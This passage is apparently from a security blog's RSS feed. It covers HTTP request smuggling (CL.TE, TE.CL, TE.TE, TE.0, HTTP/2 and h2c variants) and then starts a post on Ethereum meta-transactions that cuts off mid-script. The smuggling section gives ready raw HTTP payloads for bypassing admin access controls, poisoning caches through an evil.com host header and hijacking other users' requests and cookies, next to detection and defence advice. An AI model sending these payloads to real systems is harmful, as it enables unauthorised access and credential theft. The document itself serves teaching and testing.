2. Backend sees `Transfer-Encoding: chunked`, reads until `0\r\n\r\n`
3. Backend treats `GET /admin HTTP/1.1...` as the start of a new request

The smuggled request to `/admin` bypasses any frontend access controls.

### TE.CL (Transfer-Encoding / Content-Length)

The frontend uses `Transfer-Encoding`. The backend uses `Content-Length`.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

```

**What happens**:

1. Frontend sees `Transfer-Encoding: chunked`, reads both chunks and forwards everything
2. Backend sees `Content-Length: 3`, only reads `8\r\n`
3. Backend treats `SMUGGLED\r\n0\r\n\r\n` as the start of a new request

The `SMUGGLED` text becomes interpreted as an HTTP method (which will error), but in a real attack you&apos;d replace it with a valid request like `GET /admin HTTP/1.1`.

### TE.TE (Transfer-Encoding / Transfer-Encoding)

Both servers support `Transfer-Encoding`, but one fails to parse obfuscated headers.

```http
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
Transfer-Encoding: x

0

GET /admin HTTP/1.1
X-Ignore: X
```

**Obfuscation techniques**:

```http
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```

One server processes `chunked`, the other ignores it. The disagreement creates the smuggling opportunity.

### TE.0 (New Variant)

[Discovered in 2024](https://portswigger.net/research/breaking-the-chains-on-http-request-smuggler), this variant targets servers that ignore `Transfer-Encoding` entirely, treating body length as zero.

```http
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

GET /admin HTTP/1.1
Host: target.com

```

The frontend processes the chunked body normally. The backend ignores `Transfer-Encoding` and treats the request as having no body. Everything after the headers becomes a new request.

Researchers found this variant affecting thousands of Google Cloud-hosted websites.

## 🔬 Detecting Smuggling Vulnerabilities

### Time-Based Detection

Send a request that should cause a timeout if smuggling exists.

**CL.TE Detection**:

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

1
A
X
```

If vulnerable, the backend waits for the next chunk (it sees `X` as a malformed chunk size). The request times out.

**TE.CL Detection**:

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked

0

X
```

If vulnerable, the backend reads only 6 bytes (`0\r\n\r\nX`) and waits for more data based on the smuggled request.

### Differential Response Detection

Send a smuggled request that alters subsequent responses.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 40
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
Host: target.com
```

Follow with a normal request. If you get a 404 response for a valid URL, the smuggled `/404` request was processed first.

### Automated Tools

- **[HTTP Request Smuggler](https://github.com/PortSwigger/http-request-smuggler)** (Burp Extension): Automated detection of smuggling vulnerabilities
- **[Smuggler](https://github.com/defparam/smuggler)**: Python tool for detecting request smuggling
- **[http2smugl](https://lab.wallarm.com/http2smugl-http2-request-smuggling-security-testing-tool/)**: Tests ~564 combinations of HTTP/2 smuggling techniques

## 🚀 Exploitation Techniques

### Bypassing Security Controls

Many organizations rely on frontend servers to enforce access controls. Smuggling bypasses them entirely.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 62
Transfer-Encoding: chunked

0

GET /admin/delete-user?id=123 HTTP/1.1
Host: target.com
```

The frontend allows `POST /`. The backend processes `GET /admin/delete-user`. The WAF never sees the admin request.

### Cache Poisoning

Force the cache to store malicious content for legitimate URLs. For a deep dive, see [Practical Web Cache Poisoning](https://portswigger.net/research/practical-web-cache-poisoning).

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 116
Transfer-Encoding: chunked

0

GET /static/main.js HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
Foo: x
```

**The attack**:

1. Send this request, then a normal request for a static resource
2. The smuggled request for `/static/main.js` gets processed with `X-Forwarded-Host: evil.com`
3. If the application uses this header to generate absolute URLs, the cached response contains references to `evil.com`
4. Every user fetching `/static/main.js` gets the poisoned version

This turns a single smuggling vulnerability into a mass compromise.

### Request Hijacking

Capture other users&apos; requests by leaving a partial request on the connection.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 70
Transfer-Encoding: chunked

0

POST /log HTTP/1.1
Host: target.com
Content-Length: 400

data=
```

**The attack**:

1. The smuggled `POST /log` has `Content-Length: 400` but no body
2. The next user&apos;s request (on the same connection) gets appended as the body
3. Their cookies, credentials, and sensitive data get logged

You&apos;re literally stealing other users&apos; HTTP requests.

### Web Cache Deception

Similar to cache poisoning, but targeting user-specific data. See [Web Cache Deception research](https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf) for background.

```http
POST / HTTP/1.1
Host: target.com
Content-Length: 45
Transfer-Encoding: chunked

0

GET /account HTTP/1.1
Host: target.com
```

If the response contains user-specific data and gets cached, you can later access it from the cache.

## 🌐 HTTP/2 Smuggling

HTTP/2 uses binary framing and specifies message length differently. In theory, this eliminates smuggling. In practice, problems arise when HTTP/2 is downgraded to HTTP/1.1.

### HTTP/2 Downgrade Attacks

Many CDNs accept HTTP/2 from clients but forward requests to backends as HTTP/1.1. This translation creates opportunities.

**Injecting Transfer-Encoding**:

The HTTP/2 spec says servers should strip or block `Transfer-Encoding` headers. But some don&apos;t.

```http
:method: POST
:path: /
:authority: target.com
transfer-encoding: chunked

0

GET /admin HTTP/1.1
Host: target.com
```

If the frontend passes `transfer-encoding` to the HTTP/1.1 backend, you&apos;ve got a classic TE.CL vulnerability.

### H2C Smuggling

[HTTP/2 over cleartext (h2c)](https://bishopfox.com/blog/h2c-smuggling-request) upgrade requests can bypass reverse proxy access controls.

```http
GET / HTTP/1.1
Host: target.com
Upgrade: h2c
HTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA
Connection: Upgrade, HTTP2-Settings
```

**The attack**:

1. The proxy forwards the upgrade request to the backend
2. The backend upgrades to HTTP/2
3. Subsequent requests flow directly to the backend via HTTP/2
4. These requests bypass all proxy-level controls

After the upgrade, you have a persistent HTTP/2 connection directly to the backend. The proxy only saw the initial upgrade request.

**Tools**:
- **[h2cSmuggler](https://github.com/BishopFox/h2csmuggler)**: Detects and exploits h2c upgrade vulnerabilities

## 🛡️ Real-World CVEs

### [CVE-2025-55315](https://nvd.nist.gov/vuln/detail/CVE-2025-55315) (ASP.NET Core) - CVSS 9.9

Microsoft&apos;s highest severity ASP.NET Core vulnerability. Kestrel web server had parsing differences in how `\r`, `\n`, and `\r\n` are treated in chunk extensions.

**Impact**: Account takeover, code injection, SSRF

**Affected**: .NET 8.x and 9.x before October 2025 patches

**Root cause**: Chunk extension parsing allowed attackers to hide a second request within chunk metadata. See [Microsoft&apos;s detailed analysis](https://www.microsoft.com/en-us/msrc/blog/2025/10/understanding-cve-2025-55315) for more.

### [CVE-2025-32094](https://www.akamai.com/blog/security/cve-2025-32094-http-request-smuggling) (Akamai)

HTTP/1.x OPTIONS requests with `Expect: 100-continue` and obsolete line folding could cause parsing discrepancies between Akamai edge servers.

**Status**: Fixed platform-wide with no evidence of exploitation.

### [CVE-2024-6827](https://github.com/advisories/ghsa-hc5x-x2vx-497g) (Gunicorn)

Gunicorn 21.2.0 failed to validate `Transfer-Encoding` header values properly. Invalid values caused fallback to `Content-Length`, creating TE.CL vulnerabilities.

**Impact**: Cache poisoning, session hijacking, SSRF, XSS

**Fixed**: Version 22.0.0

### [CVE-2023-25690](https://httpd.apache.org/security/vulnerabilities_24.html) (Apache HTTP Server)

Some `mod_proxy` configurations on Apache HTTP Server allow HTTP Request Smuggling when RewriteRule or ProxyPassMatch re-inserts user-supplied data into proxied requests using variable substitution.

**Impact**: Bypass access controls, proxy unintended URLs, cache poisoning

**Affected**: Apache 2.4.0 through 2.4.55

**Fixed**: Version 2.4.56

## 🛠️ Tools of the Trade

**[Burp Suite HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)**: The essential extension for smuggling detection. Automated scanning with manual verification.

**[Smuggler](https://github.com/defparam/smuggler)**: Command-line scanner that tests multiple techniques automatically.

**[http2smugl](https://github.com/AlfCraft07/http2smugl)**: Specialized for HTTP/2 smuggling. Tests 564 technique combinations.

**[h2cSmuggler](https://github.com/BishopFox/h2csmuggler)**: Detects and exploits H2C upgrade smuggling. Curl-like syntax for easy use.

**[Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943)**: Burp extension for finding hidden parameters. Useful for cache poisoning attacks.

## 🧪 Labs &amp; Practice

**PortSwigger Web Security Academy**:
- [HTTP request smuggling, basic CL.TE vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te)
- [HTTP request smuggling, basic TE.CL vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl)
- [HTTP request smuggling, obfuscating the TE header](https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header)
- [Exploiting HTTP request smuggling to bypass front-end security controls](https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te)
- [Response queue poisoning via H2.TE request smuggling](https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-h2-response-queue-poisoning-via-te-request-smuggling)

Main resource: [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)

**TryHackMe**:
- **[HTTP Request Smuggling](https://tryhackme.com/room/httprequestsmuggling)**: Comprehensive room covering classic variants and detection techniques
- **[HTTP/2 Request Smuggling](https://tryhackme.com/room/http2requestsmuggling)**: HTTP/2 downgrade attacks and H2C smuggling

**Hack The Box**:
- **[Sink](https://app.hackthebox.com/machines/Sink)**: Insane-rated Linux box exploiting HTTP request smuggling between HAProxy and Gunicorn (CVE-2019-18277) to steal session cookies
- **[HTB Academy - HTTP Attacks](https://academy.hackthebox.com/course/preview/http-attacks)**: Comprehensive module covering CRLF injection, request smuggling, and HTTP/2 downgrading

## 🔒 Defense and Detection

### Prevention

**1. Use HTTP/2 End-to-End**

Eliminate the translation layer. HTTP/2&apos;s binary framing doesn&apos;t have the same ambiguity issues.

**2. Normalize Requests at the Edge**

If you must downgrade to HTTP/1.1, ensure the frontend:
- Strips ambiguous headers
- Uses consistent body length determination
- Rejects requests with both `Content-Length` and `Transfer-Encoding`

**3. Configure Servers Consistently**

Both frontend and backend should handle HTTP parsing identically. Test with the same configurations.

**4. Strip Upgrade Headers**

Don&apos;t forward user-supplied `Upgrade` or `Connection` headers. Hardcode them if needed.

```nginx
# Nginx: Strip upgrade headers
proxy_set_header Upgrade &quot;&quot;;
proxy_set_header Connection &quot;&quot;;
```

**5. Disable HTTP/1.0 and Keep-Alive (If Possible)**

Request smuggling requires persistent connections. Disabling them eliminates the attack vector but impacts performance.

### Detection

**Monitor for anomalies**:
- Requests with both `Content-Length` and `Transfer-Encoding`
- Malformed `Transfer-Encoding` values
- Unusual chunk sizes or chunk extensions
- `Upgrade: h2c` requests from untrusted clients

**Web Application Firewall rules**:

```yaml
# ModSecurity example
SecRule REQUEST_HEADERS:Transfer-Encoding &quot;!^chunked$&quot; \
    &quot;id:1,phase:1,deny,status:400,msg:&apos;Invalid Transfer-Encoding&apos;&quot;

SecRule &amp;REQUEST_HEADERS:Content-Length &quot;@gt 1&quot; \
    &quot;id:2,phase:1,deny,status:400,msg:&apos;Multiple Content-Length headers&apos;&quot;
```

**Log analysis**: Look for requests where the frontend and backend logged different URLs or methods.

## 🎯 Key Takeaways

- **Request smuggling exploits parsing disagreements** between frontend and backend servers
- **Classic variants** (CL.TE, TE.CL, TE.TE) remain effective against misconfigured infrastructure
- **New variants** like TE.0 continue to emerge, affecting major platforms like Google Cloud
- **HTTP/2 doesn&apos;t eliminate the risk** when downgraded to HTTP/1.1
- **H2C smuggling** can bypass all proxy-level security controls
- **Cache poisoning** turns a single vulnerability into mass compromise
- **Request hijacking** lets you steal other users&apos; credentials and sessions
- **Defense requires consistency** in how frontend and backend parse requests
- **Detection is difficult** because smuggled requests look legitimate to individual servers

## 📚 Further Reading

- **[HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)** (PortSwigger): Comprehensive guide with interactive labs
- **[HTTP Desync Attacks](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)** (James Kettle): The original 2019 research that revived interest in smuggling
- **[HTTP/2: The Sequel is Always Worse](https://portswigger.net/research/http2)** (PortSwigger Research): HTTP/2 downgrade attacks
- **[HackTricks - HTTP Request Smuggling](https://book.hacktricks.xyz/pentesting-web/http-request-smuggling)**: Extensive collection of payloads and techniques
- **[A Pentester&apos;s Guide to HTTP Request Smuggling](https://www.cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling)** (Cobalt): Practical pentesting approach

---

That&apos;s it for this week! Next issue, we&apos;ll explore **Rust Security Code Review**, where we&apos;ll analyze common vulnerability patterns in Rust code including unsafe blocks, integer overflows, panic-based DoS, and memory safety pitfalls that bypass the borrow checker.

If you&apos;re testing web applications behind CDNs, load balancers, or reverse proxies, spend some time with the PortSwigger labs. Practice detecting CL.TE and TE.CL vulnerabilities. The techniques are subtle, but the impact is severe. And remember, scanners often miss these. Manual testing is essential.

Thanks for reading, and happy hacking 🔐

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Meta-Transactions: Gasless UX and New Attack Vectors</title><link>https://www.kayssel.com/post/web3-21</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-21</guid><description>Deep dive into meta-transaction architecture, EIP-2771 trusted forwarders, relayer patterns, and the security implications of gasless transaction execution in Ethereum.</description><pubDate>Wed, 26 Nov 2025 09:00:00 GMT</pubDate><content:encoded>Gas fees kill dApp adoption.

Every on-chain action requires ETH. Users need to navigate exchanges, complete KYC, understand blockchain mechanics, and manage wallets just to try your application. For mainstream adoption, this is a dealbreaker.

Meta-transactions solve the UX problem by decoupling who signs from who pays. A user signs a message off-chain (free, no gas). A relayer submits it on-chain and pays the gas. The smart contract verifies the signature and executes as if the user sent it directly.

Perfect for UX. Terrible for security if you get it wrong.

Meta-transactions introduce new attack surfaces you won&apos;t see in standard transactions. Replay vulnerabilities. Nonce desynchronization. Front-running opportunities. Malicious relayer scenarios. The architecture requires trusting a third party and implementing bulletproof signature verification.

Miss one check, and attackers can drain funds or exploit MEV opportunities.

In this post, we&apos;ll dissect the meta-transaction architecture, examine the EIP-2771 trusted forwarder standard, implement complete working examples, and explore the attack vectors that make this pattern both powerful and dangerous. We&apos;re building on our understanding of [transaction and message signatures](/post/web3-20) to see how they enable gasless UX.

## What Are Meta-Transactions?

Standard Ethereum transactions are simple. The signer pays gas. The signer submits the transaction. One account, one action.

Meta-transactions break that model.

The flow works like this. User signs a message off-chain containing their desired function call and parameters. They send this signed message to a relayer via HTTP. The relayer wraps the signed message in a real transaction, pays the gas, and submits it to a forwarder contract. The forwarder verifies the signature and forwards the call to the target contract. The target contract executes the action as if the original user called it directly.

This enables powerful use cases. Onboard new users without requiring ETH. Let dApps subsidize gas costs. Batch multiple user operations into single transactions for efficiency.

But here&apos;s the catch. The relayer controls when (or if) your transaction gets submitted. They can front-run your action. Censor specific users. Extract MEV. The smart contract must correctly verify signatures and prevent replay attacks.

One mistake compromises the entire system.

## Meta-Transaction Architecture

A complete meta-transaction system has four components.

**User (Signer)**: Creates and signs messages off-chain. Doesn&apos;t pay gas. Doesn&apos;t interact directly with the blockchain.

**Relayer**: Receives signed messages from users, validates them, wraps them in real transactions, pays gas fees, and submits to the blockchain. Can be centralized (single server) or decentralized (network of relayers).

**Forwarder Contract**: Receives transactions from relayers, verifies signatures, manages nonces, and forwards calls to recipient contracts. This is the trust boundary. Must be audited and battle-tested.

**Recipient Contract**: The actual application logic. Receives forwarded calls and must correctly identify the original signer (not the relayer or forwarder). Uses special functions like `_msgSender()` to extract the real sender from calldata.

Here&apos;s how they interact:

```mermaid
sequenceDiagram
    participant U as User Signer
    participant R as Relayer
    participant F as Forwarder
    participant C as Recipient Contract

    Note over U: Off-chain, free
    U-&gt;&gt;U: Sign message with EIP-712
    U-&gt;&gt;R: Send signed message via HTTP

    Note over R: Validates off-chain
    R-&gt;&gt;R: Validate signature

    Note over R,F: On-chain, pays gas
    R-&gt;&gt;F: Submit transaction and pay gas
    activate F

    Note over F: Security checkpoint
    F-&gt;&gt;F: Verify signature and nonce
    F-&gt;&gt;F: Increment nonce

    F-&gt;&gt;C: Forward call with appended sender
    activate C
    C-&gt;&gt;C: Execute as original user
    C--&gt;&gt;F: Return result
    deactivate C

    F--&gt;&gt;R: Transaction receipt
    deactivate F

    R--&gt;&gt;U: Confirm execution via HTTP
```

The security boundary exists at the forwarder contract. Everything before it is off-chain and untrusted. The forwarder must enforce all security invariants: signature verification, nonce management, replay protection.

Once the call reaches the recipient contract, it must trust that the forwarder correctly identified the original signer.

The message structure contains everything needed to reconstruct and verify the intended action. Sender address, recipient contract, function calldata, nonce for replay protection, gas limit, and deadline for time-bound execution. This entire structure gets signed by the user.

## EIP-2771: Trusted Forwarder Standard

[EIP-2771](https://eips.ethereum.org/EIPS/eip-2771) standardizes the trusted forwarder pattern. It defines how forwarders structure calls and how recipient contracts extract the original sender from calldata.

The key innovation is elegant. Append the original sender address to the end of the calldata. When the forwarder calls the recipient, it encodes the user&apos;s address in the last 20 bytes. The recipient contract checks if the caller is a trusted forwarder. If so, it reads the original sender from calldata instead of using `msg.sender`.

This is implemented through the `_msgSender()` pattern. Instead of using `msg.sender` directly, contracts use a helper function that checks if the call came from a trusted forwarder:

```solidity
function _msgSender() internal view returns (address sender) {
    // If called by trusted forwarder, extract original sender from calldata
    if (msg.sender == trustedForwarder &amp;&amp; msg.data.length &gt;= 20) {
        // Original sender is appended as last 20 bytes
        assembly {
            // calldataload(pos) loads 32 bytes starting at pos
            // We load from position (calldatasize - 20) to get the last 20 bytes
            // Then shift right 96 bits (12 bytes) to get just the address
            sender := shr(96, calldataload(sub(calldatasize(), 20)))
        }
    } else {
        // Standard call, use msg.sender
        sender = msg.sender;
    }
}
```

The forwarder contract itself is relatively simple. It maintains nonces for each user, verifies signatures, and forwards calls with the sender appended. Here&apos;s a minimal implementation based on OpenZeppelin&apos;s pattern:

**⚠️ Important**: This `MinimalForwarder` implementation is from **OpenZeppelin Contracts v4.x** and is primarily for **educational and testing purposes**. OpenZeppelin explicitly states it&apos;s &quot;missing features to be a good production-ready forwarder.&quot; In **v5.x**, `MinimalForwarder` was removed entirely. For production deployments, use:
- **[OpenZeppelin&apos;s `ERC2771Forwarder`](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Forwarder.sol)** (v5.x) with deadline enforcement, batch processing, and additional security features
- **[Gas Station Network (GSN)](https://docs.opengsn.org/)** or other established relayer services like [Biconomy](https://docs.biconomy.io/) or [Gelato](https://docs.gelato.network/developer-services/relay)

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete MinimalForwarder Implementation&lt;/strong&gt;&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import &quot;@openzeppelin/contracts/utils/cryptography/ECDSA.sol&quot;;
import &quot;@openzeppelin/contracts/utils/cryptography/EIP712.sol&quot;;

/**
 * @title MinimalForwarder
 * @notice EIP-2771 trusted forwarder for meta-transactions
 * @dev Verifies signatures and forwards calls with original sender appended
 */
contract MinimalForwarder is EIP712 {
    using ECDSA for bytes32;

    // Type hash for ForwardRequest struct (EIP-712)
    bytes32 public constant FORWARD_REQUEST_TYPEHASH =
        keccak256(
            &quot;ForwardRequest(address from,address to,uint256 value,uint256 gas,uint256 nonce,bytes data)&quot;
        );

    struct ForwardRequest {
        address from;      // Original signer (user)
        address to;        // Recipient contract
        uint256 value;     // ETH value to send
        uint256 gas;       // Gas limit for forwarded call
        uint256 nonce;     // Replay protection
        bytes data;        // Function calldata
    }

    // PROTECTION: Per-user nonces prevent replay attacks
    mapping(address =&gt; uint256) private _nonces;

    event MetaTransactionExecuted(
        address indexed from,
        address indexed to,
        bytes data,
        bool success
    );

    constructor() EIP712(&quot;MinimalForwarder&quot;, &quot;0.0.1&quot;) {}

    /**
     * @notice Get current nonce for an address
     * @param from Address to query
     * @return Current nonce value
     */
    function getNonce(address from) public view returns (uint256) {
        return _nonces[from];
    }

    /**
     * @notice Verify a forward request signature
     * @param req The forward request struct
     * @param signature The signature to verify
     * @return True if signature is valid
     */
    function verify(
        ForwardRequest calldata req,
        bytes calldata signature
    ) public view returns (bool) {
        // VALIDATION: Check nonce matches current state
        if (_nonces[req.from] != req.nonce) {
            return false;
        }

        // Build EIP-712 typed data hash
        bytes32 structHash = keccak256(
            abi.encode(
                FORWARD_REQUEST_TYPEHASH,
                req.from,
                req.to,
                req.value,
                req.gas,
                req.nonce,
                keccak256(req.data)
            )
        );

        bytes32 digest = _hashTypedDataV4(structHash);

        // SECURITY: Recover signer and verify it matches claimed sender
        address signer = digest.recover(signature);
        return signer == req.from;
    }

    /**
     * @notice Execute a forward request
     * @param req The forward request to execute
     * @param signature Signature from original sender
     * @return success Whether the forwarded call succeeded
     * @return returndata Data returned by forwarded call
     */
    function execute(
        ForwardRequest calldata req,
        bytes calldata signature
    ) public payable returns (bool success, bytes memory returndata) {
        // SECURITY: Verify signature and request validity
        require(verify(req, signature), &quot;MinimalForwarder: signature invalid&quot;);

        // DEFENSE: Increment nonce before external call (checks-effects-interactions)
        _nonces[req.from]++;

        // EIP-2771: Append original sender to calldata
        bytes memory callData = abi.encodePacked(req.data, req.from);

        // Execute forwarded call with specified gas limit
        // NOTE: Nonce increments regardless of call success (similar to Ethereum account nonces)
        // This prevents nonce blocking if a call fails
        (success, returndata) = req.to.call{gas: req.gas, value: req.value}(
            callData
        );

        // SECURITY: Post-execution gas check (EIP-150 63/64 rule)
        // Ensures the parent call retained at least 1/64 of the forwarded gas
        // Note: This check occurs AFTER the call executes and nonce increments
        // It prevents gas griefing but cannot prevent nonce consumption if gas runs out
        require(
            gasleft() &gt; req.gas / 63,
            &quot;MinimalForwarder: insufficient gas forwarded&quot;
        );

        emit MetaTransactionExecuted(req.from, req.to, req.data, success);

        return (success, returndata);
    }
}
```

&lt;/details&gt;

The recipient contract must be aware of the trusted forwarder. Here&apos;s a simple example that demonstrates the pattern:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract RecipientContract {
    address public immutable trustedForwarder;
    mapping(address =&gt; uint256) public balances;

    constructor(address _forwarder) {
        trustedForwarder = _forwarder;
    }

    /**
     * @notice Extract the original sender from calldata
     * @dev Implements EIP-2771 pattern
     *
     * Calldata structure when called via forwarder:
     * [function selector (4 bytes)][function args (n bytes)][sender address (20 bytes)]
     *
     * Assembly breakdown:
     * 1. calldatasize() - returns total calldata length in bytes
     * 2. sub(calldatasize(), 20) - calculates position of last 20 bytes
     * 3. calldataload(pos) - loads 32 bytes starting at position
     * 4. shr(96, value) - shifts right 96 bits (12 bytes) to extract address
     *
     * Example: If calldata is 100 bytes total:
     * - Last 20 bytes (80-99) contain the address
     * - calldataload(80) loads bytes 80-111 (32 bytes)
     * - shr(96, ...) discards the extra 12 bytes, keeping only the address
     */
    function _msgSender() internal view returns (address sender) {
        // Check if call came from trusted forwarder
        if (msg.sender == trustedForwarder &amp;&amp; msg.data.length &gt;= 20) {
            // Extract original sender from last 20 bytes of calldata
            assembly {
                sender := shr(96, calldataload(sub(calldatasize(), 20)))
            }
        } else {
            // Standard call, use msg.sender
            sender = msg.sender;
        }
    }

    /**
     * @notice Deposit funds for a user
     * @dev Works with both direct calls and meta-transactions
     */
    function deposit() external payable {
        // Use _msgSender() instead of msg.sender for compatibility
        address user = _msgSender();
        balances[user] += msg.value;
    }

    /**
     * @notice Withdraw funds
     * @dev Only the original user can withdraw their balance
     */
    function withdraw(uint256 amount) external {
        address user = _msgSender();
        require(balances[user] &gt;= amount, &quot;Insufficient balance&quot;);

        balances[user] -= amount;
        payable(user).transfer(amount);
    }
}
```

This pattern is elegant but requires discipline. Every contract function that cares about the caller must use `_msgSender()` instead of `msg.sender`. Miss one, and you introduce a vulnerability where the forwarder address is treated as the user.

## Complete Testing Flow with Foundry

Let&apos;s build a complete end-to-end testing environment so you can see meta-transactions in action. We&apos;ll use Foundry for contract deployment and JavaScript for the client-side signing and relayer logic.

### Project Setup

First, create a new Foundry project:

```bash
# Create project directory
mkdir meta-transaction-demo
cd meta-transaction-demo

# Initialize Foundry project
forge init --no-commit

# Install OpenZeppelin contracts (v4.9.0 - contains MinimalForwarder)
# Note: v5.x removed MinimalForwarder in favor of ERC2771Forwarder
forge install OpenZeppelin/openzeppelin-contracts@v4.9.0 --no-git

# Initialize npm for JavaScript dependencies
npm init -y
npm install ethers@6
```

Update `foundry.toml` to configure remappings:

```toml
[profile.default]
src = &quot;src&quot;
out = &quot;out&quot;
libs = [&quot;lib&quot;]
remappings = [
    &quot;@openzeppelin/=lib/openzeppelin-contracts/&quot;
]

# See more config options https://github.com/foundry-rs/foundry/tree/master/crates/config
```

### Smart Contracts

Create the contracts in the `src/` directory:

**`src/MinimalForwarder.sol`**: (Use the complete implementation from the earlier section)

**`src/RecipientContract.sol`**:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete RecipientContract Implementation&lt;/strong&gt;&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/**
 * @title RecipientContract
 * @notice Example contract that supports meta-transactions via EIP-2771
 */
contract RecipientContract {
    address public immutable trustedForwarder;
    mapping(address =&gt; uint256) public balances;
    mapping(address =&gt; string) public messages;

    event Deposited(address indexed user, uint256 amount);
    event MessageSet(address indexed user, string message);

    constructor(address _forwarder) {
        trustedForwarder = _forwarder;
    }

    /**
     * @notice Extract the original sender from calldata
     * @dev Implements EIP-2771 pattern
     */
    function _msgSender() internal view returns (address sender) {
        if (msg.sender == trustedForwarder &amp;&amp; msg.data.length &gt;= 20) {
            assembly {
                sender := shr(96, calldataload(sub(calldatasize(), 20)))
            }
        } else {
            sender = msg.sender;
        }
    }

    /**
     * @notice Deposit funds - can be called via meta-transaction
     */
    function deposit() external payable {
        address user = _msgSender();
        balances[user] += msg.value;
        emit Deposited(user, msg.value);
    }

    /**
     * @notice Set a message - demonstrates gasless interaction
     */
    function setMessage(string calldata _message) external {
        address user = _msgSender();
        messages[user] = _message;
        emit MessageSet(user, _message);
    }

    /**
     * @notice Withdraw funds
     */
    function withdraw(uint256 amount) external {
        address user = _msgSender();
        require(balances[user] &gt;= amount, &quot;Insufficient balance&quot;);

        balances[user] -= amount;
        payable(user).transfer(amount);
    }

    /**
     * @notice Check if forwarder is trusted
     */
    function isTrustedForwarder(address forwarder) public view returns (bool) {
        return forwarder == trustedForwarder;
    }
}
```

&lt;/details&gt;

### Deployment Script

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Deployment Script&lt;/strong&gt;&lt;/summary&gt;

Create `script/Deploy.s.sol`:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/MinimalForwarder.sol&quot;;
import &quot;../src/RecipientContract.sol&quot;;

contract DeployScript is Script {
    function run() external {
        // Get deployer private key from environment
        uint256 deployerPrivateKey = vm.envUint(&quot;PRIVATE_KEY&quot;);

        vm.startBroadcast(deployerPrivateKey);

        // Deploy MinimalForwarder
        MinimalForwarder forwarder = new MinimalForwarder();
        console.log(&quot;MinimalForwarder deployed at:&quot;, address(forwarder));

        // Deploy RecipientContract with forwarder address
        RecipientContract recipient = new RecipientContract(address(forwarder));
        console.log(&quot;RecipientContract deployed at:&quot;, address(recipient));

        vm.stopBroadcast();

        // Print addresses in JSON format for easy copying
        console.log(&quot;\n=== Deployment Complete ===&quot;);
        console.log(&quot;Copy the following to deployed-addresses.json:\n&quot;);
        console.log(&quot;{&quot;);
        console.log(&apos;  &quot;forwarder&quot;: &quot;%s&quot;,&apos;, address(forwarder));
        console.log(&apos;  &quot;recipient&quot;: &quot;%s&quot;&apos;, address(recipient));
        console.log(&quot;}&quot;);
    }
}
```

&lt;/details&gt;

### Complete End-to-End Test Script

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete End-to-End Test Script (test-meta-tx.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-meta-tx.js` in the project root:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

/**
 * Complete end-to-end meta-transaction demonstration
 *
 * Requirements:
 * - ethers.js v6.x (this code uses v6 API)
 * - Node.js v16+
 * - Foundry/Anvil for local blockchain
 *
 * Note: For ethers v5.x, adjust imports to use:
 *   const { ethers } = require(&apos;ethers&apos;);
 *   const provider = new ethers.providers.JsonRpcProvider(...)
 *
 * Flow: User signs → Relayer submits → Contract executes
 */
async function main() {
    console.log(&apos;=== Meta-Transaction End-to-End Test ===\n&apos;);

    // Connect to local Anvil instance
    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);

    // Get network info
    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);
    console.log(&apos;Connected to network:&apos;, network.name);
    console.log(&apos;Chain ID:&apos;, chainId);

    // Load deployed contract addresses
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));
    console.log(&apos;\nContract Addresses:&apos;);
    console.log(&apos;Forwarder:&apos;, addresses.forwarder);
    console.log(&apos;Recipient:&apos;, addresses.recipient);

    // Setup wallets
    // In Anvil, these are pre-funded test accounts
    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;, // Anvil account 0
        provider
    );
    const relayerWallet = new ethers.Wallet(
